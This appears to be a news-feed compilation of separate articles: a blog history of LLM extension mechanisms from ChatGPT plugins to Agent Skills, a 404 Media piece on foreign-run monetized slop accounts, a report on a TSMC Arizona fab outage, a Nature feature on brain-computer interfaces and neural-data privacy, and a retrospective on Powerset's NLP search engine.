Three years ago, “using an LLM” meant pasting a wall of text into a chat box and hoping for something useful back. Today, we point agents at our codebases and our browsers and let them go off and act on our behalf. A key question that has been brewing under the surface during this time has been: how do we let end users actually customize these systems?

As models have become more capable, the ways end users can customize them have expanded as well. We've gone from simple system prompts to complex client-server protocols and back again.

I wanted to take a moment to reflect on the history of LLM extension over the last three years and where I see it going in the future.

ChatGPT Plugins (March 2023)

Just four months after launch, OpenAI announced ChatGPT Plugins. Looking back, these were wildly ahead of their time.

The idea was ambitious: give the LLM a link to an OpenAPI spec and let it "run wild" calling REST endpoints. It was a direct line to AGI-style thinking: universal tool use via standard APIs.

{
  "schema_version": "v1",
  "name_for_human": "TODO Manager",
  "name_for_model": "todo_manager",
  "description_for_human": "Manages your TODOs!",
  "description_for_model": "An app for managing a user's TODOs",
  "api": { "url": "/openapi.json" },
  "auth": { "type": "none" },
  "logo_url": "https://example.com/logo.png",
  "legal_info_url": "http://example.com",
  "contact_email": "hello@example.com"
}

The problem? The models weren't ready. GPT-3.5 (and even early GPT-4) struggled to navigate massive API specs without hallucinating or getting lost in context. Plus, the UX was clunky. You had to manually toggle plugins for every chat!

Here's what that looked like:

But it gave us a glimpse of the future: The Code Interpreter plugin (later Advanced Data Analysis) became indispensable, foreshadowing the powerful sandboxed execution environments we use today.

Custom Instructions (July 2023)

Custom instructions were the "smooth brain" counter-reaction to the complexity of plugins. I did a double take when writing this because I thought for sure this feature was released before plugins.

It was just a user-defined prompt appended to every chat. Simple. Obvious. Yet it solved a huge problem: repetitive context setting.

This was the spiritual ancestor to every .cursorrules and CLAUDE.md file that followed.

Custom GPTs (Nov 2023)

OpenAI repackaged instructions and tools into Custom GPTs. This was an attempt to "productize" prompt engineering. You could bundle a persona, some files, and a few actions into a shareable link.

It was a retreat from the open-ended promise of plugins toward curated, single-purpose "apps."

Memory in ChatGPT (February 2024)

So far, we've discussed manual ways to extend LLMs. Memory represented a shift toward automatic personalization.

ChatGPT Memory records details from your conversations and quietly inserts them into future context. It's like a system prompt that writes itself. If you mention you're a vegetarian, it remembers that weeks later. It’s a small feature, but it marked the beginning of agents that maintain long-term state without user intervention.

Cursor Rules (April 2024)

Cursor changed the game by putting custom instructions where they belonged: in the repo.

The .cursorrules file was a revelation. Instead of pasting context into a chat window, you committed it to git.

  • "We use tabs, not spaces."
  • "No semicolons."
  • "Always use TypeScript."

It started as a single file, then evolved into a .cursor/rules folder with sophisticated scoping. You could organize multiple rule files, and even define when they applied, for example, only for certain file types or subdirectories. It was the first time extension felt "native" to the code.

Later Cursor introduced the ability to let the LLM decide when to apply a rule, which is a pattern we will see again.

Model Context Protocol (Nov 2024)

By late 2024, models were finally smart enough to handle real tools reliably. Anthropic's Model Context Protocol (MCP) was the answer.

MCP is a heavyweight solution. An MCP client needs to keep a persistent connection to an MCP server. The server serves up tool definitions, resources, and prompts to the client (in most cases an agent); the client can send a message to the server saying a tool has been called, and the server responds with the result.

Unlike Custom Instructions (which just add context), MCP gives the model actual capabilities. It can read your repo, query your Postgres DB, or deploy to Vercel. Besides just providing tools, it also allows servers to provide resources (documents, logs) and prompts directly to the agent.

It's powerful, and perhaps a bit of overkill. While the complexity might be worth it for agent developers, asking a user to set up and connect an MCP server is a lot of friction, and there is an entire ecosystem of startups like Smithery built around making it easier to use MCP.

It is worth noting that ChatGPT apps, which were announced in October 2025, are built on top of MCP as a base layer. This is an attempt to make it easier for end users to use MCP without having to actually think about it.
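To make the weight of the protocol concrete, here is a minimal sketch of an MCP server written against the official Python SDK's FastMCP helper. The tool names and the TODO logic are invented for illustration, and the exact SDK surface may differ slightly from what is shown.

```python
# Minimal MCP server sketch (illustrative; assumes the `mcp` Python SDK).
from mcp.server.fastmcp import FastMCP

# The client (usually an agent) keeps a persistent connection to this server
# and receives the tool definitions below as part of the protocol handshake.
mcp = FastMCP("todo-manager")

TODOS: list[str] = []

@mcp.tool()
def add_todo(text: str) -> str:
    """Add a TODO item and return a confirmation."""
    TODOS.append(text)
    return f"Added: {text}"

@mcp.tool()
def list_todos() -> str:
    """Return all stored TODO items as a newline-separated string."""
    return "\n".join(TODOS) or "No TODOs yet."

if __name__ == "__main__":
    # Serves over stdio by default; the client calls tools and gets results back.
    mcp.run()
```

Even in this toy form, the user still has to install the server and wire it up to their client, which is exactly the friction described above.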

Claude Code: New Agent, New Extensions (Feb 2025)

Early 2025 brought us Claude Code , which essentially added every extension mechanism under the sun to an agent.

  • CLAUDE.md : The standard for repo-level instructions.
  • MCP: For heavy-duty tool integration.
  • Slash Commands: Like Cursor's notebooks, for reusable prompts.
  • Hooks: The ability to intercept and modify the agent's loop (e.g., "Stop if the tests fail").
  • Sub-agents: Spawning specialized workers to handle sub-tasks.
  • Output Styles: (Deprecated) Configuring tone and format.

Time will tell how many of these features will stick around in the long term. Anthropic has already tried to deprecate output styles .

Agent Skills (Oct 2025)

The next extension mechanism added to Claude Code is significant enough to warrant a deeper dive. Agent Skills are the rebirth of ChatGPT Plugins.

While MCP has a whole client-server protocol, Agent Skills are just folders of markdown files and scripts (in whatever language you choose).

The agent simply scans a skills/ directory, reads the frontmatter of every SKILL.md, and builds a lightweight index. It then reads the full contents of a skill only if it's appropriate for the current task. This solves one of the major problems with MCP: the context bloat that comes from having to load all of the tool definitions into the context window at once.
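The indexing step is simple enough to sketch in a few lines of Python. This is a toy illustration of the pattern rather than Anthropic's implementation, and the tiny frontmatter parser is an assumption made for brevity.

```python
# Toy sketch of skill discovery: scan skills/, read only the YAML-style
# frontmatter of each SKILL.md, and build a lightweight name -> description
# index. The full skill body is read later, only if the task calls for it.
from pathlib import Path

def parse_frontmatter(text: str) -> dict[str, str]:
    """Tiny parser: 'key: value' lines between the first pair of '---' markers."""
    meta: dict[str, str] = {}
    parts = text.split("---")
    if len(parts) < 3:
        return meta
    for line in parts[1].strip().splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            meta[key.strip()] = value.strip()
    return meta

def index_skills(root: str = "skills") -> dict[str, str]:
    index: dict[str, str] = {}
    for skill_md in Path(root).glob("*/SKILL.md"):
        meta = parse_frontmatter(skill_md.read_text())
        if "name" in meta and "description" in meta:
            index[meta["name"]] = meta["description"]
    return index

if __name__ == "__main__":
    # Only these short descriptions go into the agent's context window up front.
    for name, description in index_skills().items():
        print(f"{name}: {description}")
```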

Here is a snippet of the structure of a skill for doing e2e testing with Playwright taken from Anthropic's Skills examples repository:

webapp-testing/
├── examples/
│   ├── console_logging.py
│   ├── element_discovery.py
│   └── static_html_automation.py
├── scripts/
│   └── with_server.py
└── SKILL.md

There is a mix of scripts, examples, and plain text instructions. The only required file is the SKILL.md file. Let's take a look at that file:

---
name: webapp-testing
description: Toolkit for interacting with and testing local web applications using Playwright. Supports verifying frontend functionality, debugging UI behavior, capturing browser screenshots, and viewing browser logs.
license: Complete terms in LICENSE.txt
---

# Web Application Testing

To test local web applications, write native Python Playwright scripts.

**Helper Scripts Available**:

- `scripts/with_server.py` - Manages server lifecycle (supports multiple servers)

**Always run scripts with `--help` first** to see usage. DO NOT read the source until you try running the script first and find that a customized solution is absolutely necessary. These scripts can be very large and thus pollute your context window. They exist to be called directly as black-box scripts rather than ingested into your context window.

... skill continues ...

This is just a plain markdown file with some metadata and a description of the skill. The agent reads the file, which freely references other files the agent can read. In contrast, a Playwright MCP server has dozens of tool definitions to control a browser; this skill just says "you have bash, and this is how you write a Playwright script".
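The script the agent ends up writing can be as plain as the following. This is a sketch of an ordinary Python Playwright script with an invented URL and assertion; it is not taken from the skill itself.

```python
# The kind of throwaway script an agent with bash access might write after
# reading SKILL.md: plain Python Playwright, no special tool definitions needed.
from playwright.sync_api import sync_playwright

with sync_playwright() as p:
    browser = p.chromium.launch()
    page = browser.new_page()
    page.goto("http://localhost:3000")      # assumed local web app under test
    page.screenshot(path="homepage.png")    # capture evidence for later inspection
    assert "Welcome" in page.content()      # hypothetical sanity check
    browser.close()
```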

Granted, to use a skill the agent needs general-purpose access to a computer, but this is the bitter lesson in action: giving an agent general-purpose tools and trusting it to use them to accomplish a task might very well be the winning strategy over making specialized tools for every task.

What the future holds

Skills are the actualization of the dream set out by ChatGPT Plugins: just give the model instructions and some generic tools, and trust it to do the glue work in between. My hypothesis is that it might actually work this time because the models are finally smart enough for it to work.

Agent Skills work because they assume the agent has the ability to write its own tools (via bash commands). You can just give it code snippets and ask it to figure out how to run them generically for the task at hand.

Importantly, I think that skills signal a new definition of what an agent really is. An agent isn't just an LLM in a while loop. It's an LLM in a while loop with a computer strapped to it.

Claude Code is the piece of software that first made this click for me, but it is way too developer-focused to be the final form. Other applications like Zo Computer try to package the LLM and the computer together into a single application, but I think it still doesn't abstract the computer away enough from the end user. If I ask a coworker to do something, I don't need to see their entire file system; I just need to know that they have a computer.

Looking forward into 2026, I expect more and more of the LLM applications we use to have a computer strapped to them in new and interesting ways, whether we know it or not.

If I could short MCP, I would, and I expect us to go back to extending our agents with the most accessible programming language: natural language.

America’s Polarization Has Become the World's Side Hustle

403 Media
www.404media.co
2025-11-24 18:31:57
The 'psyops' revealed by X are entirely the fault of the perverse incentives created by social media monetization programs....
Original Article

A new feature on X is making people suddenly realize that a large portion of the divisive, hateful, and spammy content designed to inflame tensions, or at the very least to get lots of engagement on social media, is being published by accounts that pretend to be based in the United States but are actually run by people in countries like Bangladesh, Vietnam, India, Cambodia, and Russia. An account called “Ivanka News” is based in Nigeria, “RedPilledNurse” is from Europe, “MAGA Nadine” is in Morocco, “Native American Soul” is in Bangladesh, and “Barron Trump News” is based in Macedonia, among many, many others.

Inauthentic viral accounts on X are just the tip of the iceberg, though, as we have reported. A huge amount of the viral content about American politics and American news on social media comes from sock puppet and bot accounts monetized by people in other countries. The rise of easy-to-use, free generative AI tools has supercharged this effort, and the social media monetization programs that incentivize it are almost entirely to blame. The current disinformation and slop phenomenon on the internet makes the days of ‘Russian bot farms’ and ‘fake news pages from Cyprus’ seem quaint; the problem is now fully decentralized, distributed across the world, and almost entirely funded by social media companies themselves.

This will not be news to people who have been following 404 Media, because I have done multiple investigations about the perverse incentives that social media and AI companies have created to incentivize people to fill their platforms with slop. But what has happened on X is the same thing that has happened on Facebook, Instagram, YouTube, and other social media platforms (it is also happening to the internet as a whole, with AI slop websites laden with plagiarized content and SEO spam and monetized with Google ads). Each social media platform has either an ad revenue sharing program, a “creator bonus” program, or a monetization program that directly pays creators who go viral on their platforms .

This has created an ecosystem of side hustlers trying to gain access to these programs and YouTube and Instagram creators teaching people how to gain access to them. It is possible to find these guide videos easily if you search for things like “monetized X account” on YouTube. Translating that phrase and searching in other languages (such as Hindi, Portuguese, Vietnamese, etc) will bring up guides in those languages. Within seconds, I was able to find a handful of YouTubers explaining in Hindi how to create monetized X accounts; other videos on the creators’ pages explain how to fill these accounts with AI-generated content. These guides also exist in English, and it is increasingly popular to sell guides to make “AI influencers,” and AI newsletters, Reels accounts, and TikTok accounts regardless of the country that you’re from.

Examples include “AK Educate” (which is one of thousands), which posts every few days about how to monetize accounts on Facebook, YouTube, X, Instagram, TikTok, Etsy, and others. “How to create Twitter X Account for Monitization [sic] | Earn From Twitter in Pakistan,” is the name of a typical video in this genre. These channels are not just teaching people how to make and spam content, however. They are teaching people specifically how to make it seem like they are located in the United States, and how to create content that they believe will perform with American audiences on American social media. Sometimes they are advising the use of VPNs and other tactics to make it seem like the account is posting from the United States, but many of the accounts explain that doing this step doesn’t actually matter.

Americans are being targeted because advertisers pay higher ad rates to reach American internet users, who are among the wealthiest in the world. In turn, social media companies pay more money if the people engaging with the content are American. This has created a system where it makes financial sense for people from the entire world to specifically target Americans with highly engaging, divisive content. It pays more.

For the most part, the only ‘psyop’ here is one being run on social media users by social media companies themselves in search of getting more ad revenue by any means necessary.

For example: AK Educate has a video called “ 7 USA Faceless Channel Ideas for 2025 ,” and another video called “ USA YouTube Channel Kaise Banaye [how to] .” The first of these videos is in Hindi but has English subtitles.

“Where you get $1 on 1,000 views on Pakistani content,” the video begins, “you get $5 to $7 on 1,000 views on USA content.”

“As cricket is seen in Pakistan and India, boxing and MMA are widely seen in America,” he says. Channel ideas include “MMA,” “Who Died Today USA,” “How ships sink,” news from wars, motivational videos, and Reddit story voiceovers. To show you how pervasive this advice to make channels that target Americans is, look at this, which is a YouTube search for “USA Channel Kaise Banaye”:

Screengrabs from YouTube videos about how to target Americans

One of these videos, called “ 7 Secret USA-Based Faceless Channel Ideas for 2026 (High RPM Niches!) ” starts with an explanation of “USA currency,” which details what a dollar is and what a cent is, and its value relative to the rupee, and goes on to explain how to generate English-language content about ancient history, rare cars, and tech news. Another video I watched showed, from scratch, how to create videos for a channel called “ Voices of Auntie Mae ,” which are supposed to be inspirational videos about Black history that are generated using a mix of ChatGPT, Google Translate, an AI voice tool called Speechma, Google’s AI image generator, CapCut, and YouTube. Another shows how to use Bing search, Google News Trends, Perplexity, and video generators to create “ a USA Global News Channel Covering World Events ,” which included making videos about the war in Ukraine and Chinese military parades. A video podcast about success stories included how a man made a baseball video called “baseball Tag of the year??? #mlb” in which 49 percent of viewers were in the USA: “People from the USA watch those types of videos, so my brother sitting at home in India easily takes his audience to an American audience,” one of the creators said in the video.

I watched video after video being created by a channel called “ Life in Rural Cambodia ,” about how to create and spam AI-generated content using only your phone. Another video, presented by an AI-generated woman speaking Hindi , explains how it is possible to copy paste text from CNN to a Google Doc, run it through a program called “GravityWrite” to alter it slightly, have an AI voice read it, and post the resulting video to YouTube.

A huge and growing amount of the content that we see on the internet is created explicitly because these monetization programs exist. People are making content specifically for Americans. They are not always, or even usually, creating it because they are trying to inflame tensions. They are making it because they can make money from it, and because content viewed by Americans pays the most and performs the best. The guides to making this sort of thing focus entirely on how to make content quickly, easily, and using automated tools. They focus on how to steal content from news outlets, source things from other websites, and generate scripts using AI tools. They do not focus on spreading disinformation or fucking up America, they focus on “making money.”  This is a problem that AI has drastically exacerbated, but it is a problem that has wholly been created by social media platforms themselves, and which they seem to have little or no interest in solving.

The new feature on X that exposes this fact is notable because people are actually talking about it, but Facebook and YouTube have had similar features for years, and it has changed nothing. Clicking any random horrific Facebook slop page, such as this one called “ City USA ” which exclusively posts photos of celebrities holding birthday cakes, shows that even though it lists its address as being in New York City, the page is being run by someone in Cambodia. This page called “ Military Aviation ” which lists its address as “Washington DC,” is actually based in Indonesia. This page called “ Modern Guardian ” and which exclusively posts positive, fake AI content about Elon Musk, lists itself as being in Los Angeles but Facebook’s transparency tools say it is based in Cambodia.

Besides journalists and people who feel like they are going crazy looking at this stuff, there are, realistically, no social media users who are going into the “transparency” pages of viral social media accounts to learn where they are based. The problem is not a lack of transparency, because being “transparent” doesn’t actually matter. The only thing revealed by this transparency is that social media companies do not give a fuck about this.

About the author

Jason is a cofounder of 404 Media. He was previously the editor-in-chief of Motherboard. He loves the Freedom of Information Act and surfing.

Jason Koebler

TSMC Arizona Outage Saw Fab Halt, Apple Wafers Scrapped

Hacker News
www.culpium.com
2025-11-24 18:30:48
Comments...
Original Article

Good Evening from Taipei,

A power outage at an industrial gas facility servicing TSMC interrupted manufacturing at the company’s Fab 21 in Arizona late last quarter, sources told me. The incident stopped the flow of crucial inputs needed for chipmaking, forcing the facility to shut down for at least a few hours, I was told. As a result, the company had to scrap thousands of wafers that were in production for clients at the site which include Apple, Nvidia, and AMD.

The event happened mid-September and was caused by a power fault at its outsourced vendor Linde , a British industrial gases and engineering company, my sources tell me. TSMC runs a lot of its own gas supply in Taiwan, but opted to contract the work out for its Arizona site. While mistakes happen, and insurance may cover some of the losses from the event, Linde has been put on notice to identify and rectify the cause of the outage, I was told. A PR representative for Linde didn’t answer multiple phone calls and emails from Culpium outlining the incident and requesting comment.

Photo: Culpium & Adobe Stock

TSMC’s Arizona unit turned profitable in the first quarter of this year, a sign of the Taiwanese company’s ability to quickly scale up and churn out chips even in higher-cost locales like the US. But a 99% drop in net income in the third quarter to just $1.4 million had folks scratching their heads. One writer was quick to jump to conclusions, with the assumption that “rising costs have taken out an enormous chunk of profits, putting pressure on the firm’s operations.” The September outage, which hasn’t previously been reported, offers an alternative explanation for the profit decline.

“TSMC Arizona has begun to positively contribute to TSMC’s revenue. However, the company’s profit is influenced by multiple factors and should be read over time,” TSMC wrote in response to a detailed account of what Culpium has been told about the outage. “We also stated before that the ramp up for our overseas fabs will lead to gross margin dilution in the next five years, starting from 2025.”

Unfortunately, the company declined to immediately address the issue of the manufacturing disruption.

Fab shutdowns are unusual, at least for TSMC. With equipment so expensive, its factories are run 24/7. That means that an hour of idle time can cost millions of dollars. Compounding the financial effect of this incident was the fact that it occurred late in the quarter, leaving little room to make up for lost production before the quarter closed.

Profit margins on new facilities and at new nodes tend to be quite thin, even negative. In addition, TSMC has been ramping up capacity in Arizona and that capex gets reflected in depreciation costs even before the new equipment can start producing revenue. So it’s reasonable to see fluctuations in net income at the site. A halt in production and scrapping of wafers adds to the costs, dragging on earnings even if only slightly and briefly.

Impact to clients is likely to be negligible, I was told, and the financial loss to TSMC may be covered by insurance. Capacity at Fab 21 is still quite small, and many products being made there have already been taped out and manufactured in Taiwan previously. In past disruptions, lost production and revenue was made up in the subsequent quarter.

That said, the broader issue is that Taiwanese manufacturers are good at managing their operations when they handle it themselves, but still face struggles when they need to lean on non-Taiwanese firms at overseas facilities. The entire process of building the fab and installing equipment at Arizona has been an exercise in cross-cultural adaptation .

The most common cause of production interruptions at TSMC is Mother Nature. Earthquakes regularly rattle Taiwan, and fabs are built to withstand most of them. But sometimes a big tremor can trigger a safety shutdown, while really nasty temblors have caused actual damage. Beyond natural disasters, there’ve been few man-made shutdowns at TSMC because they’re pretty rigorous about operations.

A couple of notable problems were both caused by vendors, not TSMC internally. In 2018, a computer virus was introduced to fabs via equipment from Japan. That incident sparked a whole new approach to cybersecurity both at TSMC and among fellow Taiwanese chipmakers. Less than a year later, a batch of contaminated photoresist from a chemical supplier forced the company to scrap a large number of wafers. It made up the production the following quarter, with the problem costing TSMC around $25 million in operating profit for the year.


Linde trumpeted the TSMC contract when it landed the deal back in 2021, noting that it planned to invest $600 million into the facility. “While the project is capital and electricity intensive, it will only employ 14 plant employees and 14 truck drivers, documents from 2020 said,” the Arizona Tech Council later reported .

Apple’s A16 SoC was the first product taped out at the site, Culpium reported in September last year. AMD’s Ryzen 9000 and Nvidia Blackwell chips were since added to the lineup with designs from Bitdeer , among others, also qualified at the Arizona fab.


Mind-reading devices can now predict preconscious thoughts: is it time to worry?

Hacker News
www.nature.com
2025-11-24 18:26:09
Comments...
Original Article

Before a car crash in 2008 left her paralysed from the neck down, Nancy Smith enjoyed playing the piano. Years later, Smith started making music again, thanks to an implant that recorded and analysed her brain activity. When she imagined playing an on-screen keyboard, her brain–computer interface (BCI) translated her thoughts into keystrokes — and simple melodies, such as ‘Twinkle, Twinkle, Little Star’, rang out 1 .

But there was a twist. For Smith, it seemed as if the piano played itself. “It felt like the keys just automatically hit themselves without me thinking about it,” she said at the time. “It just seemed like it knew the tune, and it just did it on its own.”

Smith’s BCI system, implanted as part of a clinical trial, trained on her brain signals as she imagined playing the keyboard. That learning enabled the system to detect her intention to play hundreds of milliseconds before she consciously attempted to do so, says trial leader Richard Andersen, a neuroscientist at the California Institute of Technology in Pasadena.

Smith is one of roughly 90 people who, over the past two decades, have had BCIs implanted to control assistive technologies, such as computers , robotic arms or synthetic voice generators . These volunteers — paralysed by spinal-cord injuries, strokes or neuromuscular disorders, such as motor neuron disease (amyotrophic lateral sclerosis) — have demonstrated how command signals for the body’s muscles, recorded from the brain’s motor cortex as people imagine moving, can be decoded into commands for connected devices.

But Smith, who died of cancer in 2023, was among the first volunteers to have an extra interface implanted in her posterior parietal cortex, a brain region associated with reasoning, attention and planning. Andersen and his team think that by also capturing users’ intentions and pre-motor planning, such ‘dual-implant’ BCIs will improve the performance of prosthetic devices.

Nancy Smith used a brain–computer interface to make music after a car accident left her paralysed from the neck down. Credit: Caltech

Andersen’s research also illustrates the potential of BCIs that access areas outside the motor cortex. “The surprise was that when we go into the posterior parietal, we can get signals that are mixed together from a large number of areas,” says Andersen. “There’s a wide variety of things that we can decode.”

The ability of these devices to access aspects of a person’s innermost life, including preconscious thought, raises the stakes on concerns about how to keep neural data private . It also poses ethical questions about how neurotechnologies might shape people’s thoughts and actions — especially when paired with artificial intelligence.

Meanwhile, AI is enhancing the capabilities of wearable consumer products that record signals from outside the brain. Ethicists worry that, left unregulated, these devices could give technology companies access to new and more precise data about people’s internal reactions to online and other content.

Ethicists and BCI developers are now asking how previously inaccessible information should be handled and used. “Whole-brain interfacing is going to be the future,” says Tom Oxley, chief executive of Synchron, a BCI company in New York City. He predicts that the desire to treat psychiatric conditions and other brain disorders will lead to more brain regions being explored. Along the way, he says, AI will continue to improve decoding capabilities and change how these systems serve their users. “It leads you to the final question: how do we make that safe?”

Consumer concerns

Consumer neurotech products capture less-sophisticated data than implanted BCIs do. Unlike implanted BCIs, which rely on the firings of specific collections of neurons, most consumer products rely on electroencephalography (EEG). This measures ripples of electrical activity that arise from the averaged firing of huge neuronal populations and are detectable on the scalp. Rather than being created to capture the best recording possible, consumer devices are designed to be stylish (such as in sleek headbands) or unobtrusive (with electrodes hidden inside headphones or headsets for augmented or virtual reality).

Still, EEG can reveal overall brain states, such as alertness, focus, tiredness and anxiety levels. Companies already offer headsets and software that give customers real-time scores relating to these states, with the intention of helping them to improve their sports performance, meditate more effectively or become more productive, for example.

AI has helped to turn noisy signals from suboptimal recording systems into reliable data, explains Ramses Alcaide, chief executive of Neurable, a neurotech company in Boston, Massachusetts, that specializes in EEG signal processing and sells a headphone-based headset for this purpose. “We’ve made it so that EEG doesn’t suck as much as it used to,” Alcaide says. “Now, it can be used in real-life environments, essentially.”

And there is widespread anticipation that AI will allow further aspects of users’ mental processes to be decoded. For example, Marcello Ienca, a neuroethicist at the Technical University of Munich in Germany, says that EEG can detect small voltage changes in the brain that occur within hundreds of milliseconds of a person perceiving a stimulus. Such signals could reveal how their attention and decision-making relate to that specific stimulus.

Although accurate user numbers are hard to gather, many thousands of enthusiasts are already using neurotech headsets. And ethicists say that a big tech company could suddenly catapult the devices to widespread use. Apple, for example, patented a design for EEG sensors for future use in its Airpods wireless earphones in 2023.

Yet unlike BCIs aimed at the clinic, which are governed by medical regulations and privacy protections, the consumer BCI space has little legal oversight, says David Lyreskog, an ethicist at the University of Oxford, UK. “There’s a wild west when it comes to the regulatory standards,” he says.

In 2018, Ienca and his colleagues found that most consumer BCIs don’t use secure data-sharing channels or implement state-of-the-art privacy technologies 2 . “I believe that has not changed,” Ienca says. What’s more, a 2024 analysis 3 of the data policies of 30 consumer neurotech companies by the Neurorights Foundation, a non-profit organization in New York City, showed that nearly all had complete control over the data users provided. That means most firms can use the information as they please, including selling it.

Responding to such concerns, the government of Chile and the legislators of four US states have passed laws that give direct recordings of any form of nerve activity protected status. But Ienca and Nita Farahany, an ethicist at Duke University in Durham, North Carolina, fear that such laws are insufficient because they focus on the raw data and not on the inferences that companies can make by combining neural information with parallel streams of digital data. Inferences about a person’s mental health, say, or their political allegiances could still be sold to third parties and used to discriminate against or manipulate a person.

“The data economy, in my view, is already quite privacy-violating and cognitive-liberty-violating,” Ienca says. Adding neural data, he says, “is like giving steroids to the existing data economy”.

Several key international bodies, including the United Nations cultural organization UNESCO and the Organisation for Economic Co-operation and Development , have issued guidelines on these issues. Furthermore, in September, three US senators introduced an act that would require the Federal Trade Commission to review how data from neurotechnology should be protected.

Heading to the clinic

While their development advances at pace, so far no implanted BCI has been approved for general clinical use. Synchron’s device is closest to the clinic. This relatively simple BCI allows users to select on-screen options by imagining moving their foot. Because it is inserted into a blood vessel on the surface of the motor cortex, it doesn’t require neurosurgery. It has proved safe, robust and effective in initial trials 4 , and Oxley says Synchron is discussing a pivotal trial with the US Food and Drug Administration that could lead to clinical approval.

Elon Musk’s neurotech firm Neuralink in Fremont, California, has surgically implanted its more complex device in the motor cortices of at least 13 volunteers who are using it to play computer games, for example, and control robotic hands. Company representatives say that more than 10,000 people have joined waiting lists for its clinical trials.

At least five more BCI companies have tested their devices in humans for the first time over the past two years, making short-term recordings (on timescales ranging from minutes to weeks) in people undergoing neurosurgical procedures. Researchers in the field say the first approvals are likely to be for devices in the motor cortex that restore independence to people who have severe paralysis — including BCIs that enable speech through synthetic voice technology .

As for what’s next, Farahany says that moving beyond the motor cortex is a widespread goal among BCI developers. “All of them hope to go back further in time in the brain,” she says, “and to get to that subconscious precursor to thought.”

Last year, Andersen’s group published a proof-of-concept study 5 in which internal dialogue was decoded from the parietal cortex of two participants, albeit with an extremely limited vocabulary. The team has also recorded from the parietal cortex while a BCI user played the card game blackjack (pontoon) 6 . Certain neurons responded to the face values of cards, whereas others tracked the cumulative total of a player’s hand. Some even became active when the player decided whether to stick with their current hand or take another card.

Casey Harrell (with his wife Levana Saxon) uses his brain implant to generate synthetic speech. Credit: Ian Bates/New York Times/Redux/eyevine

Both Oxley and Matt Angle, chief executive of BCI company Paradromics, based in Austin, Texas, agree that BCIs in brain regions other than the motor cortex might one day help to diagnose and treat psychiatric conditions. Maryam Shanechi, an engineer and computer scientist at the University of Southern California in Los Angeles, is working towards this goal — in part by aiming to identify and monitor neural signatures of psychiatric diseases and their symptoms 7 .

BCIs could potentially track such symptoms in a person, deliver stimulation that adjusts neural activity and quantify how the brain responds to that stimulation or other interventions. “That feedback is important, because you want to precisely tailor the therapy to that individual’s own needs,” Shanechi says.

Shanechi does not yet know whether the neural correlates of psychiatric symptoms will be trackable across many brain regions or whether they will require recording from specific brain areas. Either way, a central aspect of her work is building foundation models of brain activity. Such models, constructed by training AI algorithms on thousands of hours of neural data from numerous people, would in theory be generalizable across individuals’ brains.

Powerset’s natural language search system (2012)

Lobsters
brenocon.com
2025-11-24 18:24:03
Comments...
Original Article

There’s a lot to say about Powerset , the short-lived natural language search company (2005-2008) where I worked after college. AI overhype, flying too close to the sun, the psychology of tech journalism and venture capitalism, etc. A year or two ago I wrote the following bit about Powerset’s technology in response to a question on Quora . I’m posting a revised version here.

Question: What was Powerset’s core innovation in search? As far as I can tell, they licensed an NLP engine. They did not have a question answering system or any system for information extraction. How was Powerset’s search engine different than Google’s?

My answer: Powerset built a system vaguely like a question-answering system on top of Xerox PARC’s NLP engine. The output is better described as query-focused summarization rather than question answering; primarily, it matched semantic fragments of the user query against indexed semantic relations, with lots of keyword/ngram-matching fallback for when that didn’t work, and tried to highlight matching answers in the result snippets.

The Powerset system indexed semantic relations and entities (the latter often being wordnet/freebase nodes), did a similar analysis on the user query, then formed a database query against that index of semantic relations, synonym/hypernym expansions, and other textual information (e.g. word positions or gender identification). Then with all the rich (complicated) index information, you have neat features for ranking and snippet generation (i.e. query-focused summarization), but it’s so complicated it’s easy to screw up. (And don’t get me started on trying to run a segfault-prone Tcl/Prolog/C parser under an unstable 2006-era Hadoop…)
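As a toy illustration of the general idea, and emphatically not Powerset's actual code or schema, indexing semantic relations and matching a parsed query fragment against them might look something like this (all data and names invented):

```python
# Toy illustration: index subject-relation-object triples and answer a parsed
# query fragment, with a crude synonym-expansion fallback.
from collections import defaultdict

TRIPLES = [
    ("edison", "invented", "phonograph"),
    ("bell", "invented", "telephone"),
    ("edison", "founded", "general electric"),
]

SYNONYMS = {"created": "invented", "started": "founded"}

index: dict[tuple[str, str], list[str]] = defaultdict(list)
for subj, rel, obj in TRIPLES:
    index[(subj, rel)].append(obj)

def answer(subject: str, relation: str) -> list[str]:
    relation = SYNONYMS.get(relation, relation)  # synonym-style expansion fallback
    return index.get((subject, relation), [])

# A query like "What did Edison create?" parses to (edison, created, ?):
print(answer("edison", "created"))  # -> ['phonograph']
```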

Here is a diagram I wrote in July 2007 to try to communicate internally what the entire system was doing. As you might imagine, it was difficult to keep everyone on the same page. This diagram only depicts the indexing pipeline; the query-time system would have required another diagram. NLP folks will note some rather surprising technology choices in some places. (Unweighted FST for NER? Yes. In fairness, it was eventually replaced by a statistical tagger. But the company did have >$12 million in funding at this point.)

As to whether this was “different than Google,” sure, I suppose. Certainly no serious search engine was crazy enough to do constituent parses (and unification parses, lexical lookups, coreference, etc.) of all sentences at index time — raising indexing costs, compared to keyword indexing, by perhaps 100x — but Powerset sure did.

It’s worth noting that since then, Google has added much more question-answering and structured information search, presumably using related but different techniques than Powerset used. (And Google even had some simple question-answering back then, as I recall; and, these days it’s said they parse the web all the time, at least for experimental purposes. They now have excellent groups of highly-regarded specialists in parsing, unsupervised lexical semantics, machine translation, etc., which Powerset never did.) And IBM’s Watson project more recently managed to produce a nice factoid question-answering system. In principle, deep semantic analysis of web text could be useful for search (and shallow NLP, like morphology and chunking, perhaps more so); but as the primary thing for a search startup to focus on, it seemed a little extreme.

As to what the “core innovation” was, that’s a loaded question. Was all this stuff useful? Usually I am cynical and say Powerset had no serious innovation for search. But that is just an opinion. Powerset developed some other things that were more user-visible, including a browser of the extracted semantic relations (“Factz” or “Powermouse”), a mostly separate freebase-specific query system (somewhat similar to Google’s recently released Knowledge Graph results), and completely separately, an open-source BigTable clone for index-time infrastructure (HBase, which has been developed quite a bit since then). In general, I found that design/UI engineering people respected Powerset for the frontends, scalability engineers respected Powerset for the HBase contributions, but NLP and IR experts were highly cynical about Powerset’s technology claims. If you get a chance, try asking researchers who were at ACL 2007 in Prague about Barney Pell’s keynote; I am told a number walked out while it was underway.

For good commentary on the situation at the time, see these Fernando Pereira blog posts from 2007: Powerset in PARC Deal , and Powerset in the NYT .

After the acquisition, Microsoft filed patent applications for all the Powerset-specific proprietary tech. You can read all of them on the USPTO website or wherever; for example, this page seems to list them.


